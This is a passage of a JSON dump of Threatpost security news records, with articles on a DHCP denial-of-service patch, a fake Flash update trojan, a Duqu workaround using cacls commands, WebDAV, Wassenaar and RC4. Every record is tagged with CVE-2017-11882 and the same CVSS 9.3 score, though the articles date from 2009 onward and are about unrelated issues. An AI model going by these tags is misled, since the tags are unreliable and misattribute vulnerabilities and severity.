nearly all IPv4 DHCP clients and relays and most servers, ISC said in its [advisory](<https://kb.isc.org/article/AA-01334>).\n\n\u201cA badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally,\u201d ISC said.\n\nDHCP, or the Dynamic Host Configuration Profile, automates the assignment of IP hosts with IP addresses and configuration information. Its used in all Windows clients and most Windows server deployments dating back to Windows 98.\n\nThe use of DHCP frees Windows administrators, for example, from manually configuring IP addresses for networked computers.\n\nISC added that servers, clients and relays built to process only unicast packets are not affected by this vulnerability, the organization cautions that this is an unusual configuration.\n\n\u201cNot all potentially-affected builds will actually be affected, but because it is difficult to identify or predict those which should be upgraded, our advice is that all builds should be considered vulnerable,\u201d ISC said, adding that it is not aware of active exploits against this flaw.\n\nISC added that there are no workaround available, but there are some measures that can be taken to limit the exposure of DHCP servers.\n\nAdmins are advised to upgrade immediately to DHCP version 4.1-ESV-R12-P1 or DHCP version 4.3.3-P1.\n", "cvss3": {}, "published": "2016-01-13T10:00:25", "type": "threatpost", "title": "DHCP Denial of Service Vulnerability Patched", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:35:27", "id": "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "href": "https://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "Microsoft\u2019s initial move into the security products market, the ISA Server, has evolved well beyond its firewall roots. Now known as the Threat Management Gateway, the product is being positioned as a comprehensive Web security gateway. But as Eric Ogren writes in his [review of the Threat Management Gateway](<http://searchsecurity.techtarget.com/news/column/0,294698,sid14_gci1351077,00.html>) [SearchSecurity.com], the beta release offers enterprise IT shops some solid capabilities, but also has some considerable drawbacks.\n\nMicrosoft and nearly any other company on the planet, knows how to build products for mid-tier businesses. In high tech, vendors often prematurely rush features to market in efforts to win awards from reviewers and impress prospects with the depth of their feature checklist. Microsoft takes a very conservative approach with its security products to minimize customer administrative costs and provide fundamental security that works for the duration of the Microsoft relationship. This long term view has benefits and drawbacks for IT that can be illustrated by TMG.\n", "cvss3": {}, "published": "2009-03-18T15:56:00", "type": "threatpost", "title": "Microsoft's Threat Management Gateway is a mixed bag", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:35", "id": "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "href": "https://threatpost.com/microsofts-threat-management-gateway-mixed-bag-031809/72404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yanex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. Jose said by highlighting the text, you\u2019re able to read it to the end and notice a condition that states the user\u2019s home back will be changed\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains were for the new start pages, as well as the domains hosting the malicious Flash update were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also change to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy \nsettings for the next version of their search engine. Currently the site strips \nSSL when forced into HTTPS and in turn, brings up an advisory on browsers signaling \nan unsafe connection.\n\n[Introduced at Toorcon, the Firefox extension ](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>)allows \nattackers to capture site cookies from users on unsecured wireless networks and \nbrowse under their logon. \n\nWith the advent of Firesheep and subsequently, its surge of recently \nconverted hackers, HTTP session hijacking is becoming more and more of a \nconcern. Sites like Bing will have to adopt suitable security techniques to \ncontend with the extensions\u2019 further proliferation. \n\nFirefox 4, scheduled for release by the end of the year will \nhelp. [As \nreported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport \nSecurity, ensuring the browser always requests a safe HTTPS session from sites. \nHowever If sites like Bing don\u2019t implement SSL into sites, the lack of full-end \nencryption will still be a problem and HTTPS won\u2019t even be an option.\n\n[Network \nWorld has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n\n** \n**\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "Dennis Fisher talks with Adam Shostack of Microsoft about the taxonomy he helped develop for classifying how PCs are compromised, what he would and wouldn\u2019t change in The New School of Information Security and who he\u2019s learned the most from.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\nImage via [adamshostack](<http://www.flickr.com/photos/adamshostack/7308776486/in/photolist-c8RoBG/lightbox/>)\u2018s Flickr photostream, Creative Commons\n", "cvss3": {}, "published": "2011-12-12T15:12:45", "type": "threatpost", "title": "Adam Shostack on Methods of Compromise, the New School and Learning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:46:17", "id": "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "href": "https://threatpost.com/adam-shostack-methods-compromise-new-school-and-learning-121211/75984/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "description": "[](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>)Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next week\u2019s November patch Tuesday release. The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually, users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%syswow64t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time.,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "cvss3": {}, "published": "2011-11-04T11:47:32", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:25", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:18", "description": "[From CIO (Robert McMillan)](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>)\n\n[](<https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/>)Corporate IT staffers will get a double whammy next week, as both [Microsoft and Oracle are set to release critical security updates](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>) [cio.com] on the same day, including a likely fix for an Excel bug that has been used by cybercriminals.\n\nThis month, Oracle\u2019s quarterly software fixes and Microsoft\u2019s monthly patches happen to fall on the same day, next Tuesday. For Windows users, there will be a lot to patch. Microsoft plans to release [eight updates in total](<http://www.microsoft.com/technet/security/bulletin/ms09-apr.mspx>) [microsoft.com]: Five of them are for Windows, with a single update each for Internet Explorer, Excel and Microsoft\u2019s Internet Security and Acceleration (ISA) server. [Read the full story](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>). More from [ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3116>) [zdnet.com]\n", "cvss3": {}, "published": "2009-04-09T20:27:27", "type": "threatpost", "title": "After attacks, Microsoft readies security patches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:26", "id": "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "href": "https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/72521/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "\n\nEven for the most experienced security professionals, understanding complex attacks and vulnerabilities sometimes can be a serious challenge. A perfect example is the recent Microsoft IIS WebDAV vulnerability, which surfaced last week and has yet to be patched by Microsoft. It\u2019s a complicated issue, which some experts say was made more so by the guidance that the software maker released about it. Luckily, [Steve Friedl of Unixwiz.net](<http://unixwiz.net/techtips/ms971492-webdav-vuln.html>) has taken the time to make some sense of it all.\n\nFriedl, a security consultant, put together a flow chart that helps administrators figure out whether their Web servers are vulnerable. His key piece of advice is, if you\u2019re not sure whether your servers are at risk, find an expert who can test your machines and give you a definitive answer.\n\nThe vulnerability allows a remote anonymous user to bypass authentication checks and access the system in ways not intended for anonymous users: systems **are** getting hacked with this, and it\u2019s important to assess your local security posture and take steps to mitigate exposures that are discovered.\n\nMicrosoft published information on this in their [ Security Advisory (971492)](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), but we found their guidance confusing for users who were not IIS experts. While researching what each of the pieces meant, we decided to create this Tech Tip with a simple flowchart that will help rapidly get to the \u201cnot vulnerable\u201d stage if that\u2019s indeed the case.\n\nMost systems are likely not vulnerable, but unless the flowchart below leads to \u201cYou are not vulnerable\u201d, we strongly recommend seeking local expertise to help assess your situation properly.\n\nAs Friedl and others have noted, attackers are actively exploiting the IIS WebDAV vulnerability, and as there\u2019s no patch available yet, it\u2019s vital that enterprises take a close look at their Web servers to see whether they\u2019re vulnerable. Microsoft officials have said they\u2019re investigating the vulnerability and it would not be surprising to see an out-of-band patch for IIS, given the seriousness of the problem.\n", "cvss3": {}, "published": "2009-05-28T14:11:35", "type": "threatpost", "title": "A guide to the IIS WebDAV vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "href": "https://threatpost.com/guide-iis-webdav-vulnerability-052809/72745/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)[](<https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. [Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com] Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com]\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic &amp; International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily, Goodwin claimed.\n\n\u201cTo be able to understand [malware] \u2014 what it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. For many companies, to carry out certain research activities, they\u2019d be forced to request export licenses, something that many security officials believe would work against the idea of information sharing.\n\nThe issue has been a largely one-sided one. Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. \u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe &amp; Johnson LLP, said during the panel. Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:50", "description": "Microsoft didn\u2019t beat around the bush when it [warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall. Now it\u2019s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.\n\nIn a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.\n\n[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET to do the same, through modifying the system registry. While .NET users looking to download the updates can find them at Microsoft\u2019s Download Center and Microsoft\u2019s Update Catalog, it\u2019s keeping the update off of Windows Update \u201cin order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.\u201d\n\nRC4\u2019s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J. Bernstein enabled an attacker to fully compromise a victim\u2019s session that\u2019s protected by TLS/RC4.\n\nThe advisory was one of three Microsoft issued yesterday.\n\n[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.\n\nMicrosoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they\u2019ll be most useful in enterprise environments where Windows domains are deployed.\n\nIn [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company\u2019s certification program. As the modules were private and third-party, not a whole lot more information was given but Microsoft claims the move was as part of its \u201congoing efforts to protect customers.\u201d\n\nAll advisories of course come on the heels of [yesterday\u2019s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). The update addressed 13 issues, including critical vulnerabilities in IE and its Sharepoint Server software.\n", "cvss3": {}, "published": "2014-05-14T13:21:35", "type": "threatpost", "title": "Microsoft Giving .NET Users The Option to Shed RC4", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-14T17:21:35", "id": "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "href": "https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Fearing destructive attacks precipitated by the availability of the nation-state exploits in the wild that spawned the WannaCry outbreak, Microsoft today announced that its Patch Tuesday updates would include fixes for older versions of Windows, including XP.\n\nThe move is unusual and mimics a similar one made in the hours following WannaCry\u2019s appearance on May 12 when hundreds of thousands of Windows machines worldwide were compromised and their data encrypted.\n\nMicrosoft had pleaded with Windows admins to apply MS17-010, a security bulletin released in March, one month before the ShadowBrokers leaked a cadre of weaponized Windows exploits, but many did not take heed. Microsoft had to scramble as WannaCry made its way around the globe to release an [emergency update](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>) late in the evening of May 12 for Windows XP and Windows 8 machines, easing any potential pain for unsupported versions of Windows; EternalBlue, the NSA exploit in question, targeted SMB running on Windows XP and Windows 7 computers.\n\n\u201cDue to the elevated risk for destructive cyber attacks at this time, we made the decision to take this action because applying these updates provides further protection against potential attacks with characteristics similar to WannaCrypt,\u201d said Adrienne Hall, general manager of Microsoft\u2019s Cyber Defense Operations Center.\n\n\u201cIn reviewing the updates for this month, some vulnerabilities were identified that pose elevated risk of cyber attacks by government organizations, sometimes referred to as nation-state actors or other copycat organizations,\u201d Hall said. \u201cTo address this risk, today we are providing additional security updates along with our regular Update Tuesday service. These security updates are being made available to _all_ customers, including those using older versions of Windows.\u201d\n\nMicrosoft said that customers with automatic updates enabled are protected and would not have to take additional action to receive these updates. Microsoft said this is a rare decision and encouraged admins to apply the critical updates.\n\n\u201cOur decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,\u201d said Eric Doerr, general manager of the Microsoft Security Response Center. \u201cBased on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly.\u201d\n\nSince WannaCry, security experts have been warning Windows admins about the ferocity of the EternalBlue exploit and that it could be loaded with [any sort of payload](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>), including wiper malware, banking Trojans, or more ransomware. Attackers have already on two occasions used it to spread cryptocurrency mining utilities.\n\nIt\u2019s unknown whether Microsoft was given any advance warning of another upcoming leak or if there are rumblings of another WannaCry-style attack. The ShadowBrokers promised monthly leaks of anything from Windows 10 exploits to mobile attacks to stolen nuclear and missile data in a new subscription service it promised to start next month.\n\nMicrosoft also maintained that organizations should long ago have moved away from older, unsupported platforms such as XP. Windows 10, for example, contains many new mitigations that prevent exploits such as EternalBlue from successfully compromising computers. Opponents of today\u2019s move\u2014and of the May 12 emergency update\u2014contend that these concessions on Microsoft\u2019s part to provide these types of updates will allow organizations to rationalize staying on unsupported versions of Windows.\n", "cvss3": {}, "published": "2017-06-13T15:34:53", "type": "threatpost", "title": "Risk of 'Destructive Cyber Attacks' Prompts Microsoft to Update XP Again", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-13T19:35:24", "id": "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "href": "https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:25", "description": "Microsoft has hired yet another well-known security researcher to join its ever-growing team of exploit and defense experts. This time it\u2019s Ken Johnson, known in the hacker world as [Skywing](<http://www.nynaeve.net/>). Johnson is known as an expert on debugging and reverse engineering, and has done a tremendous amount of work [tearing apart Windows defenses](<http://www.uninformed.org/?v=2&a=4>) specifically.\n\nBefore moving to Microsoft, Johnson was working for Positive Networks, a VPN provider. In a [blog post](<http://blogs.msdn.com/michael_howard/archive/2009/03/24/ken-johnson-skywing-joins-microsoft.aspx>) announcing Johnson\u2019s hiring, Microsoft software security guru Mike Howard praised Johnson\u2019s experience and skill. \n\n\u201cKen brings an enormous amount of reverse engineering and defense-subversion skill to Microsoft. Ken will be working on anything and everything related vulnerabilities, exploits, defenses, bypassing defenses and more,\u201d Howard said.\n\nJohnson\u2019s hiring is the latest in a series of interesting personnel moves for Microsoft\u2019s security group. The changes essentially began about three years ago when Adam Shostack joined Microsoft. Shostack is a well-known security and privacy expert and had spent years in start-ups and smaller organizations and was not afraid to be critical of Microsoft\u2019s policies. \n\n\u201cIn the past, I\u2019ve [heaped scorn](<http://www.securityfocus.com/news/315>) on Microsoft\u2019s security related decisions. Over the last few years, I\u2019ve watched Microsoft embrace security. I\u2019ve watched them make very large investments in security, including hiring my friends and colleagues. And really, I\u2019ve watched them produce results,\u201d Shostack wrote in a [blog post at the time of his hiring at Microsoft](<http://www.emergentchaos.com/archives/2006/06/im_joining_microsoft.html>). \n\nThen in January 2008 Microsoft hired Crispin Cowan, an expert on Linux and open-source security and was the brains behind the Immunix security-enhanced Linux distribution. And a few months later Matt Miller joined Microsoft, as well. Known as [Skape](<http://hick.org/~mmiller/>), Miller was a big part of 